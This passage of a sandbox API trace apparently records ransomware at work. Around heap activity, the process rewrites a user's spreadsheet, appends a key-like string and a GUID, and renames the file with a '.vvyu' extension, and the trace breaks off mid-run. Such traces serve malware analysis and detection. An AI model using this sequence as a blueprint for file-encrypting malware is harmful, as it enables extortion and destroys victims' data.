RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0192.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0192.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.282] GetCurrentThreadId () returned 0x264 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45050 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.282] GetCurrentThreadId () returned 0x264 [0192.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82c18 [0192.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d18 [0192.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d78 [0192.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0192.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d90 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d30 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d00 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0192.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41a88 | out: hHeap=0x6a0000) returned 1 [0192.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.293] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xc64b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xc64b, lpOverlapped=0x0) returned 1 [0192.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.294] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc650, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.294] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.295] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.295] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.295] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.295] CloseHandle (hObject=0x584) returned 1 [0192.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0192.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0192.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0192.297] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\qGqm\\B_1kIj6HPFfLN8h7Oij.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\qgqm\\b_1kij6hpffln8h7oij.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\qGqm\\B_1kIj6HPFfLN8h7Oij.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\qgqm\\b_1kij6hpffln8h7oij.xlsx.vvyu")) returned 1 [0192.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.300] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.303] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5be9dee0, ftCreationTime.dwHighDateTime=0x1d8a049, ftLastAccessTime.dwLowDateTime=0xa18a4b70, ftLastAccessTime.dwHighDateTime=0x1d8a3db, ftLastWriteTime.dwLowDateTime=0xa18a4b70, ftLastWriteTime.dwHighDateTime=0x1d8a3db, nFileSizeHigh=0x0, nFileSizeLow=0xc650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B_1kIj6HPFfLN8h7Oij.xlsx", cAlternateFileName="B_1KIJ~1.XLS")) returned 0 [0192.304] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0192.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.305] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0192.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0192.305] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0192.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 